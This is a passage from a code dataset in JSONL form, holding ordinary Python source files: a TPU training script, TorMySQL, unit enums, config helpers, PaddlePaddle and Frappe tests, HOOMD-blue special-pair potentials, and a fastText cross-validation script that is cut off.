labels.set_shape(labels_shape)\n\n return features, labels\n\n dataset = dataset.map(set_shapes)\n dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)\n\n return dataset\n\n\ndef main(args):\n # pass the args as params so the model_fn can use\n # the TPU specific args\n params = vars(args)\n\n if args.use_tpu:\n # additional configs required for using TPUs\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(args.tpu)\n tpu_config = tf.contrib.tpu.TPUConfig(\n num_shards=8, # using Cloud TPU v2-8\n iterations_per_loop=args.save_checkpoints_steps)\n\n # use the TPU version of RunConfig\n config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n model_dir=args.model_dir,\n tpu_config=tpu_config,\n save_checkpoints_steps=args.save_checkpoints_steps,\n save_summary_steps=100)\n\n # TPUEstimator\n estimator = tf.contrib.tpu.TPUEstimator(\n model_fn=model_fn,\n config=config,\n params=params,\n train_batch_size=args.train_batch_size,\n eval_batch_size=32,\n export_to_tpu=False)\n else:\n config = tf.estimator.RunConfig(model_dir=args.model_dir)\n\n estimator = tf.estimator.Estimator(\n model_fn,\n config=config,\n params=params)\n\n estimator.train(train_input_fn, max_steps=args.max_steps)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--model-dir',\n type=str,\n default='/tmp/tpu-template',\n help='Location to write checkpoints and summaries to. Must be a GCS URI when using Cloud TPU.')\n parser.add_argument(\n '--max-steps',\n type=int,\n default=1000,\n help='The total number of steps to train the model.')\n parser.add_argument(\n '--sequence-length',\n type=int,\n default=5,\n help='The sequence length for an LSTM model.')\n parser.add_argument(\n '--train-batch-size',\n type=int,\n default=16,\n help='The training batch size. The training batch is divided evenly across the TPU cores.')\n parser.add_argument(\n '--save-checkpoints-steps',\n type=int,\n default=100,\n help='The number of training steps before saving each checkpoint.')\n parser.add_argument(\n '--use-tpu',\n action='store_true',\n help='Whether to use TPU.')\n parser.add_argument(\n '--tpu',\n default=None,\n help='The name or GRPC URL of the TPU node. Leave it as `None` when training on AI Platform.')\n\n args, _ = parser.parse_known_args()\n\n main(args)\n"} {"ext": "py", "sha": "1a30cdb47628e61535589b874104f41f740099a1", "content": "'''\nTorMySQL: presents a Tornado and asyncio Future-based API and greenlet for non-blocking access to MySQL.\n\nThe MIT License (MIT)\n\nCopyright (c) 2014, 2015 TorMySQL contributors\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nfrom .client import Client\nfrom .cursor import Cursor, DictCursor, SSCursor, SSDictCursor\nfrom .pool import ConnectionPool\nfrom .cursor import CursorNotReadAllDataError, CursorNotIterError\nfrom .pool import ConnectionPoolClosedError, ConnectionPoolUsedError, ConnectionNotFoundError, ConnectionNotUsedError, ConnectionUsedError, WaitConnectionTimeoutError\nfrom .log import set_log\nfrom . import helpers\n\n\nversion = \"0.4.3\"\nversion_info = (0, 4, 3)\n\n\ndef connect(*args, **kwargs):\n client = Client(*args, **kwargs)\n from .platform import current_ioloop\n current_ioloop()\n return client.connect()\n\n\nConnection = connect"} {"ext": "py", "sha": "1a30cedd51c7910003261ce113a8040019783092", "content": "\"\"\"\n\nGuidelines for enum classes:\n 1. Write members names extensively, with no abbreviation, i.e., 'Watt' instead of 'W'.\n 2. Attributes should follow the International System of Units (SI) [https://en.wikipedia.org/wiki/International_System_of_Units], i.e., for power the attribute is 'W'.\n 3. Do not use multipliers such as 'Kilowatt'.\n 3.1 Exceptions to this rule are: 'Kilometer', 'Kilogram'.\n 3.2 In case of an exception, the simple form should be avoided altogether, e.g., given the 'Kilometer' is an Unit, then 'Meter' should not be used.\n\n\"\"\"\n\nimport enum\n\n@enum.unique\nclass DisplayNames(str, enum.Enum):\n ElectricityOutput = \"ElectricityOutput\"\n ElectricityInput = \"ElectricityInput\"\n\n@enum.unique\nclass LoadTypes(str, enum.Enum):\n Any = \"Any\"\n\n Electricity = \"Electricity\"\n Irradiance = \"Irradiance\"\n Speed = \"Speed\"\n Heating = \"Heating\"\n Cooling = \"Cooling\"\n\n Volume = \"Volume\"\n Temperature = \"Temperature\"\n Time = \"Time\"\n\n # Substance\n Gas = \"Gas\"\n Hydrogen = \"Hydrogen\"\n Oxygen = \"Oxygen\"\n Water = \"Water\"\n WarmWater = \"WarmWater\"\n \n Price = \"Price\"\n\n@enum.unique\nclass Units(str, enum.Enum):\n # Unphysical\n Any = \"-\"\n Percent = \"%\"\n\n # Power\n Watt = \"W\"\n kW = \"kW\"\n kWh_per_timestep = \"kWh per timestep\"\n\n # Power per area\n Wm2 = \"W per square meter\"\n Whm2 = \"Wh per square meter\"\n\n # Speed\n MeterPerSecond = \"m/s\"\n\n # Energy\n Wh = \"Wh\"\n kWh = \"kWh\"\n\n # Volume\n Liter = \"L\"\n\n # Volume per time\n l_per_timestep = \"Liter per timestep\"\n\n # Mass\n kg = \"kg\"\n\n # Mass flow\n kg_per_sec = \"kg/s\"\n\n # Degrees\n Celsius = \"°C\"\n Kelvin = 'K'\n\n # Degrees\n Degrees = \"Degrees\"\n\n # Time\n Seconds = \"s\"\n \n # Cost\n c_per_kWh = \"Cents per kWh\"\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a30cfa53f348743fd4bf86be5cbcb11e737e4d5", "content": "import argparse\nimport collections\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport yaml\n\n__all__ = [\n \"load_config\",\n \"save_config\",\n \"flatten_dict\",\n \"sanitize_dict\",\n \"update_namespace\",\n \"extract\",\n \"s2b\",\n \"g\",\n]\n\n# Load config file\ndef load_yaml(f_path):\n with open(f_path, \"r\") as stream:\n return yaml.safe_load(stream)\n\n\ndef load_json(f_path):\n with open(f_path, \"r\") as f:\n return json.load(f)\n\n\ndef load_config(path, flatten=True):\n _, ext = os.path.splitext(path)\n\n assert ext in [\n \".json\",\n \".yaml\",\n \".yml\",\n ], f\"Only support yaml and json config, but '{ext}' given.\"\n if 
ext == \"json\":\n cfg = load_json(path)\n else:\n cfg = load_yaml(path)\n\n if cfg is None:\n cfg = dict()\n\n if flatten:\n cfg = flatten_dict(cfg)\n return cfg\n\n\n# Dump config file\ndef save_json(obj, f_path):\n with open(f_path, \"w\") as f:\n json.dump(obj, f, ensure_ascii=False, indent=4)\n\n\ndef save_yaml(obj, f_path):\n with open(f_path, \"w\") as f:\n yaml.dump(obj, f)\n\n\ndef save_config(obj, path, ext=None):\n _, fext = os.path.splitext(path)\n if fext.startswith(\".\"):\n fext = fext[1:]\n if fext != \"\":\n assert (\n ext == None or fext == ext\n ), f\"Extension conflict between '{path}' and '{ext}'.\"\n ext = fext\n\n if ext in [\"yaml\", \"yml\"]:\n save_yaml(obj, path)\n else:\n save_json(obj, path)\n\n\n# Utils\ndef flatten_dict(d, keep_parent=False, sep=\"_\", parent_key=\"\"):\n \"\"\"Flatten dict to only one nest\n\n Args:\n d (dict): dictionary to flatten\n keep_parent (bool, optional): If True, keep parent's key name, and keys should all be str. Defaults to False.\n sep (str, optional): Effective only keep_parent=True, separator between keys. Defaults to \"_\".\n parent_key (str, optional): For recursive call. Defaults to \"\".\n\n Returns:\n dict: flattened dict\n \"\"\"\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key and keep_parent else k\n if isinstance(v, collections.abc.MutableMapping):\n items.extend(\n flatten_dict(v, keep_parent, parent_key=new_key, sep=sep).items()\n )\n else:\n items.append((new_key, v))\n\n items_key = [i[0] for i in items]\n assert len(items_key) == len(set(items_key))\n\n return dict(items)\n\n\ndef sanitize_dict(params, to_str=True, none_fill=\"N/A\"):\n \"\"\"Convert all items into tensorboard supported values or str\n\n Args:\n params (dict): dict to sanitize\n to_str (bool, optional): If True, turn all items to string. Defaults to True.\n\n Returns:\n dict: sanitized dict\n \"\"\"\n items = []\n for k in params.keys():\n # numpy to float\n if isinstance(params[k], (np.bool_, np.integer, np.floating)):\n items.append([k, params[k].item()])\n elif isinstance(params[k], np.ndarray):\n items.append([k, str(params[k].tolist())])\n # torch to float\n elif isinstance(params[k], torch.Tensor):\n items.append([k, str(params[k].tolist())])\n # None to str\n elif params[k] is None:\n items.append([k, none_fill])\n # Others to str\n elif type(params[k]) not in [bool, int, float, str, torch.Tensor]:\n items.append([k, str(params[k])])\n else:\n items.append([k, params[k]])\n\n # All to str\n if to_str:\n items[-1][-1] = str(items[-1][-1])\n\n return dict(items)\n\n\ndef update_namespace(args, dictionary, overwrite=True, rest=False):\n \"\"\"update Namespace with given dictionary\n\n Args:\n args (Namespace): Namespace to be updated\n dictionary (dict): dictionary\n overwrite (bool, optional): If True, All Namespace value will overwritten by dictionary value. Otherwise, only Namespace with None will be overwritten. Defaults to True.\n rest: Effective only if overwrite=True. If True, add keys in dictionary but not in args into args. 
Otherwise raise an error.\n\n Returns:\n Namespace\n \"\"\"\n dict_args = vars(args)\n\n if overwrite:\n dict_args.update(dictionary)\n else:\n for k, v in dict_args.items():\n if v is not None:\n pass\n elif k in dictionary:\n dict_args[k] = dictionary[k]\n for k, v in dictionary.items():\n if k not in dict_args:\n if rest:\n dict_args[k] = v\n else:\n raise KeyError(f\"no key {k}\")\n\n args = argparse.Namespace(**dict_args)\n return args\n\n\ndef extract(s, delimit=\"-\", num=0):\n \"\"\"Extract the num_th word from string s\n\n Args:\n s (str): string to be parsed\n delimit (str, optional): delimiter. Defaults to \"-\".\n num (int, optional): . Defaults to 0.\n\n Returns:\n (str, List[str])\n \"\"\"\n s_list = s.split(delimit)\n first = s_list[num]\n s_list.pop(num)\n s_rest = delimit.join(s_list)\n return first, s_rest\n\n\n# argparse type\ndef s2b(v):\n if isinstance(v, bool):\n return v\n if v.lower() in (\"yes\", \"true\", \"t\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"f\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value expected.\")\n\n\n# template generator for params.py\ndef g(template, name_list, placeholder=\"{}\"):\n items = []\n for name in name_list:\n t = []\n t.append(template[0].replace(placeholder, name))\n t.append(template[1].replace(placeholder, name))\n t.extend(template[2:])\n items.append(t)\n return items\n"} {"ext": "py", "sha": "1a30cfa669f7ecab7cef4bb662d4d5ff96d72048", "content": "# -*- coding:utf-8 -*-\n\nimport unittest\n\nclass TestZip(unittest.TestCase):\n TESTDATA = [\n (\"aabbb\" , \"a2b3\"),\n (\"aaaa\", \"a4\"),\n (\"abc\", \"abc\"),\n (\"abcdd\",\"abcdd\")\n ]\n def setUp(self):\n self.judge = Zipper()\n\n def testsame(self):\n for src, exp in self.TESTDATA:\n self.assertEqual(self.judge.zipString(src),exp)\n\nclass Zipper:\n def zipString(self, iniString):\n # write code here\n record = []\n prevchar = None\n prevlen = 0\n\n for letter in iniString:\n if letter == prevchar:\n prevlen += 1\n else:\n if prevlen > 0:\n record.append({prevchar : prevlen})\n prevlen = 1\n prevchar = letter\n if prevlen > 0:\n record.append({prevchar : prevlen})\n newstring = ''\n for item in record:\n for key,value in item.iteritems():\n newstring += \"{}{}\".format(key,value)\n return newstring if len(newstring) < len(iniString) else iniString\n\n \nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30d1395283ec9bc60dcceaa1b5963b9176b60a", "content": "# Copyright (c) 2021 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom op_test import OpTest, skip_check_grad_ci\nimport paddle\nimport paddle.fluid.core as core\nimport paddle.fluid as fluid\nfrom paddle.fluid import compiler, Program, program_guard\nfrom paddle.fluid.framework import convert_np_dtype_to_dtype_\n\npaddle.enable_static()\n\n\nclass TestAny8DOp(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (3, 5, 4)}\n self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAnyOpWithDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype(\"bool\")}\n self.attrs = {'dim': [1]}\n self.outputs = {'Out': self.inputs['X'].any(axis=1)}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAny8DOpWithDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (3, 6)}\n self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAnyOpWithKeepDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype(\"bool\")}\n self.attrs = {'dim': (1), 'keep_dim': True}\n self.outputs = {\n 'Out': np.expand_dims(\n self.inputs['X'].any(axis=self.attrs['dim']), axis=1)\n }\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nclass TestAny8DOpWithKeepDim(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = \"reduce_any\"\n self.place = paddle.NPUPlace(0)\n self.inputs = {\n 'X': np.random.randint(0, 2,\n (2, 5, 3, 2, 2, 3, 4, 2)).astype(\"bool\")\n }\n self.attrs = {'dim': (1), 'keep_dim': True}\n self.outputs = {\n 'Out': np.expand_dims(\n self.inputs['X'].any(axis=self.attrs['dim']), axis=1)\n }\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30d2ed1b74ceaffb3883db6e04fdf92eac0e39", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Awab Abdoun 
and Mohammed Elamged and Contributors\n# See license.txt\nfrom __future__ import unicode_literals\n\nimport frappe\nimport unittest\n\nclass TestWorkstation(unittest.TestCase):\n\tpass\n"} {"ext": "py", "sha": "1a30d485a01b4350dc9549cb1de8c8e27d31ae76", "content": "# Copyright (c) 2009-2019 The Regents of the University of Michigan\n# This file is part of the HOOMD-blue project, released under the BSD 3-Clause License.\n\n# Maintainer: jglaser / All Developers are free to add commands for new features\n\nR\"\"\" Potentials between special pairs of particles\n\nSpecial pairs are used to implement interactions between designated pairs of particles.\nThey act much like bonds, except that the interaction potential is typically a pair potential,\nsuch as LJ.\n\nBy themselves, special pairs that have been specified in an initial configuration do nothing. Only when you\nspecify an force (i.e. special_pairs.lj), are forces actually calculated between the\nlisted particles.\n\"\"\"\n\nfrom hoomd import _hoomd\nfrom hoomd.md import _md\nfrom hoomd.md import force;\nfrom hoomd.md import bond;\nimport hoomd;\n\nimport math;\nimport sys;\n\nclass coeff:\n R\"\"\" Define special_pair coefficients.\n\n The coefficients for all special pair potentials are specified using this class. Coefficients are\n specified per pair type.\n\n There are two ways to set the coefficients for a particular special_pair potential.\n The first way is to save the special_pair potential in a variable and call :py:meth:`set()` directly.\n See below for an example of this.\n\n The second method is to build the coeff class first and then assign it to the\n special_pair potential. There are some advantages to this method in that you could specify a\n complicated set of special_pair potential coefficients in a separate python file and import\n it into your job script.\n\n Example::\n\n my_coeffs = hoomd.md.special_pair.coeff();\n special_pair_force.pair_coeff.set('pairtype1', epsilon=1, sigma=1)\n special_pair_force.pair_coeff.set('backbone', epsilon=1.2, sigma=1)\n\n \"\"\"\n\n ## \\internal\n # \\brief Initializes the class\n # \\details\n # The main task to be performed during initialization is just to init some variables\n # \\param self Python required class instance variable\n def __init__(self):\n self.values = {};\n self.default_coeff = {}\n\n ## \\var values\n # \\internal\n # \\brief Contains the vector of set values in a dictionary\n\n ## \\var default_coeff\n # \\internal\n # \\brief default_coeff['coeff'] lists the default value for \\a coeff, if it is set\n\n ## \\internal\n # \\brief Sets a default value for a given coefficient\n # \\details\n # \\param name Name of the coefficient to for which to set the default\n # \\param value Default value to set\n #\n # Some coefficients have reasonable default values and the user should not be burdened with typing them in\n # all the time. set_default_coeff() sets\n def set_default_coeff(self, name, value):\n self.default_coeff[name] = value;\n\n def set(self, type, **coeffs):\n R\"\"\" Sets parameters for special_pair types.\n\n Args:\n type (str): Type of special_pair (or a list of type names)\n coeffs: Named coefficients (see below for examples)\n\n Calling :py:meth:`set()` results in one or more parameters being set for a special_pair type. Types are identified\n by name, and parameters are also added by name. 
Which parameters you need to specify depends on the special_pair\n potential you are setting these coefficients for, see the corresponding documentation.\n\n All possible special_pair types as defined in the simulation box must be specified before executing run().\n You will receive an error if you fail to do so. It is not an error, however, to specify coefficients for\n special_pair types that do not exist in the simulation. This can be useful in defining a potential field for many\n different types of special_pairs even when some simulations only include a subset.\n\n Examples::\n\n my_special_pair_force.special_pair_coeff.set('pair1', epsilon=1, sigma=1)\n my_special_pair_force.pair_coeff.set('pair2', epsilon=0.5, sigma=0.7)\n my_special_pair_force.pair_coeff.set(['special_pairA','special_pairB'], epsilon=0, sigma=1)\n\n Note:\n Single parameters can be updated. If both ``k`` and ``r0`` have already been set for a particle type,\n then executing ``coeff.set('polymer', r0=1.0)`` will update the value of ``r0`` and leave the other\n parameters as they were previously set.\n\n \"\"\"\n hoomd.util.print_status_line();\n\n # listify the input\n type = hoomd.util.listify(type)\n\n for typei in type:\n self.set_single(typei, coeffs);\n\n ## \\internal\n # \\brief Sets a single parameter\n def set_single(self, type, coeffs):\n type = str(type);\n\n # create the type identifier if it hasn't been created yet\n if (not type in self.values):\n self.values[type] = {};\n\n # update each of the values provided\n if len(coeffs) == 0:\n hoomd.context.msg.error(\"No coefficients specified\\n\");\n for name, val in coeffs.items():\n self.values[type][name] = val;\n\n # set the default values\n for name, val in self.default_coeff.items():\n # don't override a coeff if it is already set\n if not name in self.values[type]:\n self.values[type][name] = val;\n\n ## \\internal\n # \\brief Verifies that all values are set\n # \\details\n # \\param self Python required self variable\n # \\param required_coeffs list of required variables\n #\n # This can only be run after the system has been initialized\n def verify(self, required_coeffs):\n # first, check that the system has been initialized\n if not hoomd.init.is_initialized():\n hoomd.context.msg.error(\"Cannot verify special_pair coefficients before initialization\\n\");\n raise RuntimeError('Error verifying force coefficients');\n\n # get a list of types from the particle data\n ntypes = hoomd.context.current.system_definition.getPairData().getNTypes();\n type_list = [];\n for i in range(0,ntypes):\n type_list.append(hoomd.context.current.system_definition.getPairData().getNameByType(i));\n\n valid = True;\n # loop over all possible types and verify that all required variables are set\n for i in range(0,ntypes):\n type = type_list[i];\n\n if type not in self.values.keys():\n hoomd.context.msg.error(\"Pair type \" +str(type) + \" not found in pair coeff\\n\");\n valid = False;\n continue;\n\n # verify that all required values are set by counting the matches\n count = 0;\n for coeff_name in self.values[type].keys():\n if not coeff_name in required_coeffs:\n hoomd.context.msg.notice(2, \"Notice: Possible typo? 
Force coeff \" + str(coeff_name) + \" is specified for type \" + str(type) + \\\n \", but is not used by the special pair force\\n\");\n else:\n count += 1;\n\n if count != len(required_coeffs):\n hoomd.context.msg.error(\"Special pair type \" + str(type) + \" is missing required coefficients\\n\");\n valid = False;\n\n return valid;\n\n ## \\internal\n # \\brief Gets the value of a single %special_pair %force coefficient\n # \\detail\n # \\param type Name of special_pair type\n # \\param coeff_name Coefficient to get\n def get(self, type, coeff_name):\n if type not in self.values.keys():\n hoomd.context.msg.error(\"Bug detected in force.coeff. Please report\\n\");\n raise RuntimeError(\"Error setting special_pair coeff\");\n\n return self.values[type][coeff_name];\n\n ## \\internal\n # \\brief Return metadata\n def get_metadata(self):\n return self.values\n\n\n## \\internal\n# \\brief Base class for special pair potentials\n#\n# A special pair in hoomd.* reflects a PotentialSpecialPair in c++. It is responsible\n# for all high-level management that happens behind the scenes for hoomd\n# writers. 1) The instance of the c++ bond force itself is tracked and added to the\n# System 2) methods are provided for disabling the force from being added to the\n# net force on each particle\nclass _special_pair(force._force):\n ## \\internal\n # \\brief Constructs the bond potential\n #\n # \\param name name of the bond potential instance\n #\n # Initializes the cpp_force to None.\n # If specified, assigns a name to the instance\n # Assigns a name to the force in force_name;\n def __init__(self, name=None):\n # initialize the base class\n force._force.__init__(self, name);\n\n self.cpp_force = None;\n\n # setup the coefficient vector (use bond coefficients for that)\n self.pair_coeff = coeff();\n\n self.enabled = True;\n\n def update_coeffs(self):\n coeff_list = self.required_coeffs;\n # check that the force coefficients are valid\n if not self.pair_coeff.verify(coeff_list):\n hoomd.context.msg.error(\"Not all force coefficients are set\\n\");\n raise RuntimeError(\"Error updating force coefficients\");\n\n # set all the params\n ntypes = hoomd.context.current.system_definition.getPairData().getNTypes();\n type_list = [];\n for i in range(0,ntypes):\n type_list.append(hoomd.context.current.system_definition.getPairData().getNameByType(i));\n\n for i in range(0,ntypes):\n # build a dict of the coeffs to pass to proces_coeff\n coeff_dict = {};\n for name in coeff_list:\n coeff_dict[name] = self.pair_coeff.get(type_list[i], name);\n\n param = self.process_coeff(coeff_dict);\n self.cpp_force.setParams(i, param);\n\n ## \\internal\n # \\brief Get metadata\n def get_metadata(self):\n data = force._force.get_metadata(self)\n\n # make sure coefficients are up-to-date\n self.update_coeffs()\n\n data['pair_coeff'] = self.pair_coeff\n return data\n\nclass lj(_special_pair):\n R\"\"\" LJ special pair potential.\n\n Args:\n name (str): Name of the special_pair instance.\n\n :py:class:`lj` specifies a Lennard-Jones potential energy between the two particles in each defined pair.\n\n This is useful for implementing e.g. special 1-4 interactions in all-atom force fields.\n\n The pair potential uses the standard LJ definition.\n\n .. 
math::\n :nowrap:\n\n \\begin{eqnarray*}\n V_{\\mathrm{LJ}}(r) = & 4 \\varepsilon \\left[ \\left( \\frac{\\sigma}{r} \\right)^{12} -\n \\alpha \\left( \\frac{\\sigma}{r} \\right)^{6} \\right] & r < r_{\\mathrm{cut}} \\\\\n = & 0 & r \\ge r_{\\mathrm{cut}} \\\\\n \\end{eqnarray*}\n\n where :math:`\\vec{r}` is the vector pointing from one particle to the other in the bond.\n\n Coefficients:\n\n - :math:`\\varepsilon` - *epsilon* (in energy units)\n - :math:`\\sigma` - *sigma* (in distance units)\n - :math:`\\alpha` - *alpha* (unitless) - *optional*: defaults to 1.0\n - :math:`r_{\\mathrm{cut}}` - *r_cut* (in distance units)\n\n Example::\n\n lj = special_pair.lj(name=\"my_pair\")\n lj.pair_coeff.set('pairtype_1', epsilon=5.4, sigma=0.47, r_cut=1.1)\n\n Note:\n The energy of special pair interactions is reported in a log quantity **special_pair_lj_energy**, which\n is separate from those of other non-bonded interactions. Therefore, the total energy of nonbonded interactions\n is obtained by adding that of standard and special interactions.\n\n .. versionadded:: 2.1\n\n \"\"\"\n def __init__(self,name=None):\n hoomd.util.print_status_line();\n\n # initialize the base class\n _special_pair.__init__(self);\n\n # check that some bonds are defined\n if hoomd.context.current.system_definition.getPairData().getNGlobal() == 0:\n hoomd.context.msg.error(\"No pairs are defined.\\n\");\n raise RuntimeError(\"Error creating special pair forces\");\n\n # create the c++ mirror class\n if not hoomd.context.exec_conf.isCUDAEnabled():\n self.cpp_force = _md.PotentialSpecialPairLJ(hoomd.context.current.system_definition,self.name);\n else:\n self.cpp_force = _md.PotentialSpecialPairLJGPU(hoomd.context.current.system_definition,self.name);\n\n hoomd.context.current.system.addCompute(self.cpp_force, self.force_name);\n\n # setup the coefficient options\n self.required_coeffs = ['epsilon','sigma','alpha','r_cut'];\n self.pair_coeff.set_default_coeff('alpha', 1.0);\n\n def process_coeff(self, coeff):\n r_cut = coeff['r_cut'];\n epsilon = coeff['epsilon'];\n sigma = coeff['sigma'];\n alpha = coeff['alpha'];\n\n lj1 = 4.0 * epsilon * math.pow(sigma, 12.0);\n lj2 = alpha * 4.0 * epsilon * math.pow(sigma, 6.0);\n r_cut_squared = r_cut * r_cut\n return _hoomd.make_scalar3(lj1, lj2, r_cut_squared);\n\n\nclass coulomb(_special_pair):\n R\"\"\" Coulomb special pair potential.\n\n Args:\n name (str): Name of the special_pair instance.\n\n :py:class:`coulomb` specifies a Coulomb potential energy between the two particles in each defined pair.\n\n This is useful for implementing e.g. special 1-4 interactions in all-atom force fields. It uses a standard Coulomb interaction with a scaling parameter. This allows for using this for scaled 1-4 interactions like in OPLS where both the 1-4 LJ and Coulomb interactions are scaled by 0.5.\n\n .. 
math::\n :nowrap:\n\n \\begin{eqnarray*}\n V_{\\mathrm{Coulomb}}(r) = & \\alpha \\cdot \\left[ \\frac{q_{a}q_{b}}{r} \\right] & r < r_{\\mathrm{cut}} \\\\\n = & 0 & r \\ge r_{\\mathrm{cut}} \\\\\n \\end{eqnarray*}\n\n where :math:`\\vec{r}` is the vector pointing from one particle to the other in the bond.\n\n Coefficients:\n\n - :math:`\\alpha` - Coulomb scaling factor (defaults to 1.0)\n - :math:`q_{a}` - charge of particle a (in hoomd charge units)\n - :math:`q_{b}` - charge of particle b (in hoomd charge units)\n - :math:`r_{\\mathrm{cut}}` - *r_cut* (in distance units)\n\n Example::\n\n coul = special_pair.coulomb(name=\"myOPLS_style\")\n coul.pair_coeff.set('pairtype_1', alpha=0.5, r_cut=1.1)\n\n Note:\n The energy of special pair interactions is reported in a log quantity **special_pair_coul_energy**, which\n is separate from those of other non-bonded interactions. Therefore, the total energy of non-bonded interactions\n is obtained by adding that of standard and special interactions.\n\n .. versionadded:: 2.2\n .. versionchanged:: 2.2\n\n \"\"\"\n def __init__(self, name=None):\n hoomd.util.print_status_line();\n\n # initialize the base class\n _special_pair.__init__(self);\n\n # check that some bonds are defined\n if hoomd.context.current.system_definition.getPairData().getNGlobal() == 0:\n hoomd.context.msg.error(\"No pairs are defined.\\n\");\n raise RuntimeError(\"Error creating special pair forces\");\n\n # create the c++ mirror class\n if not hoomd.context.exec_conf.isCUDAEnabled():\n self.cpp_force = _md.PotentialSpecialPairCoulomb(hoomd.context.current.system_definition,self.name);\n else:\n self.cpp_force = _md.PotentialSpecialPairCoulombGPU(hoomd.context.current.system_definition,self.name);\n\n hoomd.context.current.system.addCompute(self.cpp_force, self.force_name);\n\n # setup the coefficient options\n self.required_coeffs = ['alpha', 'r_cut'];\n self.pair_coeff.set_default_coeff('alpha', 1.0);\n\n def process_coeff(self, coeff):\n r_cut = coeff['r_cut'];\n alpha = coeff['alpha'];\n\n r_cut_squared = r_cut * r_cut;\n return _hoomd.make_scalar2(alpha, r_cut_squared);\n\n"} {"ext": "py", "sha": "1a30d52820578b9a5b4b5ce25638b5f0564f77fa", "content": "#!/usr/bin/python3\n\"\"\"\n fasttextRun.py: run fasttext via python interface\n usage: fasttextRun.py -f file [-n N]\n note: default number of N is 10 (10-fold cross validation)\n 20180105 erikt(at)xs4all.nl\n\"\"\"\n\nimport fasttext\nimport os\nimport random\nimport splitFile\nimport sys\n\nCOMMAND = sys.argv.pop(0)\nDIM = 300\nLARGENUMBER = 100000\nMINCOUNT = 5\nrandom.seed()\nTMPFILENAME = \"fasttextRun.\"+str(os.getpid())+\".\"+str(random.randint(0,LARGENUMBER))\n\ndef makeTrainFile(inFileName,i,n):\n outFileName = TMPFILENAME+\".train\"\n outFile = open(outFileName,\"w\")\n for j in range(0,n):\n if j != i:\n inFile = open(inFileName+\".\"+str(j),\"r\")\n for line in inFile: outFile.write(line)\n inFile.close()\n outFile.close()\n return(outFileName)\n\ndef fasttextRun(inFileName,i,n):\n trainFileName = makeTrainFile(inFileName,i,n)\n modelFileName = TMPFILENAME+\".model\"\n testFileName = inFileName+\".\"+str(i)\n classifier = fasttext.supervised(trainFileName,modelFileName,dim=DIM,min_count=MINCOUNT)\n # ,pretrained_vectors=\"/home/erikt/software/fastText/wiki.nl.vec\")\n result = classifier.test(testFileName)\n os.unlink(trainFileName)\n os.unlink(modelFileName+\".bin\")\n return(result.precision)\n\ndef main(argv):\n inFileName, n = 